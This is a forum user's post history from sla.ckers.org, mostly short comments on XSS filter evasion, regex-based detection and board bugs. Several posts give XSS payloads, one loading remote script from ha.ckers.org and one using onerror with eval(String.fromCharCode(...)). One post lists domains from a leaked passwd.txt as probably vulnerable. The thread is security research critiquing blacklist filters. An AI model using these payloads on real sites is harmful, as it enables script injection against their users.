Sla.ckers.org
Ways to improve page rank, or deceptively get more users to your websites or away from your competition. Where you can discuss SEO (search engine optimization) issues as it relates to computer security. 

Current Page: 1 of 91
Results 1 - 30 of 2712
7 months ago
rsnake
To you too, guys! :)
Forum: OMG Ponies
3 years ago
rsnake
FYI - you trouble makers you with all your being security experts and talking about your fancy security stuff. Stop taunting the Germans with false positives - they get cranky:
> From: <abuse@clean-mx.de>
> To: <support@onr.com>
> Cc: <soc@us-cert.gov>
> Subject: (207.200.14.141)-->(support@onr.com)
> viruses sites (1 so far) within your network, ple
Forum: Obfuscation
3 years ago
rsnake
I think his point was that it can be traced back to the real people.
Forum: OMG Ponies
3 years ago
rsnake
The problem is the hashes will vary 100% if they are good hashing algorithms if even something as simple as "Jan" is replaced by "Feb". You'll probably have to think of something a little more clever - like percent different or something. I believe the search engines know what headers and footers look like so they can disregard that part and just focus on the meat.
Forum: Robots/Spiders/CAPTCHAs, oh my
3 years ago
rsnake
But it's "secur"image! ;)
Forum: Robots/Spiders/CAPTCHAs, oh my
3 years ago
rsnake
That may be a lot of IPs to correlate. But it's a clever idea if there's another place they may have done something similar. The chances of collisions are usually fairly low except for AOL, etc...
Forum: OMG Ponies
3 years ago
rsnake
To you as well, clhac - welcome to the boards!
Forum: Intro
3 years ago
rsnake
I'll have to check this out. Very cool. But what was your original impetus for writing this? PHP shells under a certain size or something? Or does it also help with performance in some way?
Forum: Projects
3 years ago
rsnake
Yeah, I'm not sure why that was there when it wasn't previously, but we removed it. Thanks.
Forum: News and Links
3 years ago
rsnake
Hey guys, the settings should be identical from the last install we had, so theoretically there should be no new bugs, but I know at least one existed (thanks to Gareth Heyes for pointing it out). I disabled smilies and auto-linking, which appears to have fixed that problem and coincidentally makes the board less annoying, so it's a win-win. Let me know if you guys see any other issues pop up.
Forum: Bugs
3 years ago
rsnake
Cool idea. May want to add variable width encoding escape here too... although technically it qualifies as an attribute escape, so maybe it gets you no extra points. Same deal with null bytes in HTML tags - not sure if that gives you extra points by those rules.
Forum: Obfuscation
4 years ago
rsnake
That's a lot to respond to so I'll only respond to the part that mentions me to be brief. I don't think I ever made a fuss out of NTO. I think the only thing I've ever even said about them is that they got number one in Larry's report (twice) and that I agree that depth metrics is one solid metric among several that is worth thinking about when evaluating a scanner. In fact I've said nice thing
Forum: Projects
4 years ago
rsnake
The following also are probably vulnerable as a result:
$ cat passwd.txt |cut -f 5 -d :|cut -f 1 -d " "|egrep "\."
media.livinghistorylibrary.org
thesciotovoice.com
theultranyc.com
chiquitonis.com
kingsdestiny.org
cooler.futurenotfound.com
fishkimissions.net
thepaperofwabash.com
musicvcds.com
mistressshah.com
pooparticles.com
hplife.org
visceralreactions.com
mi
Forum: Full Disclosure
4 years ago
rsnake
@rvdh - the URL is down, do you have a current location for your symbols doc?
Forum: Projects
4 years ago
rsnake
I was toying around with vtunnel (vtunnel.com) for a bit last night, and didn't see an easy way to de-cloak. It seems to do a pretty good job of replacing direct links and re-writing things like eval and document.write document.location, et al. I was curious if anyone else had any luck working around it for de-cloaking purposes? Kind of a fun project in a way.
Forum: Projects
4 years ago
rsnake
Uh, the RSnake one is me, the other one, not so much.
Forum: News and Links
4 years ago
rsnake
Code obfuscation is the very next thing they'll do if they know this is how they're being detected. But it'll probably work well for a while.
Forum: Projects
4 years ago
rsnake
This is compiled from over half a million separate HTTP requests. The data is in aggregate but it's still pretty cool just to look at it like this: http://www.secureseo.com/blog/2009/09/08/list-of-http-headers/
Forum: Projects
4 years ago
rsnake
So that would make it 3.4 x 10^38 chances for someone to brute force your credential. I can see why it's maybe annoying to stay logged in, but would you rather we arbitrarily log you out after x hours? That's what the logout button is for. If it really worries you, I'd just click logout when I'm done for the day. That's what I do. No need to keep user sessions active any longer than I have to
Forum: Bugs
6 years ago
rsnake
@.mario - I'm certainly not meaning to say this hasn't been time well spent. What I mean is that the fundamental approach of blacklisting is flawed - as evidenced by 17 pages of bugs. To me that's a fun experiment, and not an actual "solve". Solving the problem is by disabling all HTML for instance. Solving it is content restrictions. Solving is turning off all active content in the
Forum: Projects
6 years ago
rsnake
I don't mean to rain on the parade here - but I have to ask a very serious question. Do you all think this will actually come to a stop at some point and it will be perfect? Do you think after 17 pages of bugs there is a realistic end in sight? Every time I read this thread I just keep thinking, why are we continuing down this path that keeps being proven to fail in one way or another? I'm a
Forum: Projects
7 years ago
rsnake
Without going through each and every one of these:
(["|'][\s]*\>) //finds html breaking injections including whitespace attacks
Breakable by: " a >
(["|'][\s]*\<) //finds attribute breaking injections including whitespace attacks
Breakable by: " a <
Regex is hard.
Forum: Projects
7 years ago
rsnake
You haven't seen URLs with < or > in them before? Hmmm... you should visit some math sites. ;) Also, some sites DO allow HTML to be entered into them, so you would risk breaking those sites as well if you implemented something like that globally. But it still might be worth it to get rid of the risk. My feeling is it would have to be more intelligent than just looking for a few risky
Forum: Projects
7 years ago
rsnake
If I had a dollar for every time I heard someone say that the browser shouldn't render something I've written I'd be a very wealthy man. :) Honestly, that's a great compliment in a way. Creating something that humans think shouldn't work but computers do is an art form. It is amazing though.
Forum: Projects
7 years ago
rsnake
All the components of it are on the cheat sheet, but not that particular string, no. There are hundreds of variants of each vector; I only list them so people know why they work, not as the bible. But don't filter on .js, that's just ridiculously easy to get around: <script/src=//ha.ckers.org/.j Yes, it's some small amount of protection, but it's certainly not a panacea (nothing is in w
Forum: Projects
7 years ago
rsnake
It does in Firefox, sure.
Forum: Projects
7 years ago
rsnake
Sure, if you want false positives though why bother with any sort of regex other than <|%3C|>|%3E|'|"|(|)|%27|%22|%28|%29|%00|¼|%BC etc...? I mean if you don't want to allow that stuff then you should at least know when it's hitting your server. Maybe not blocking but definitely alerting... If you don't care about false positives, why not log anything suspicious and then write a p
Forum: Projects
7 years ago
rsnake
uh... no... I mean that would fix that single variant, but it wouldn't stop someone from working around it: <script/src=//ha.ckers.org/xss.js
Forum: Projects
7 years ago
rsnake
@mario - That did catch the first thing I tried. Unfortunately the first thing I tried was totally benign. So you'll probably end up with a whole lot of false positives: <IMG SRC="http://ha.ckers.org/images/kcpimp.jpg"> @jungsonn - that filter (RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) ) will fall down for something as simple as the half open vector in Fi
Forum: Projects
7 years ago
rsnake
Ugh... whatever... this gets by it. I was lazy, but trust me, it's easy to circumvent that filter: <IMG SRC="$user_input" ALT="IMG"> " onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))" a="
Forum: Projects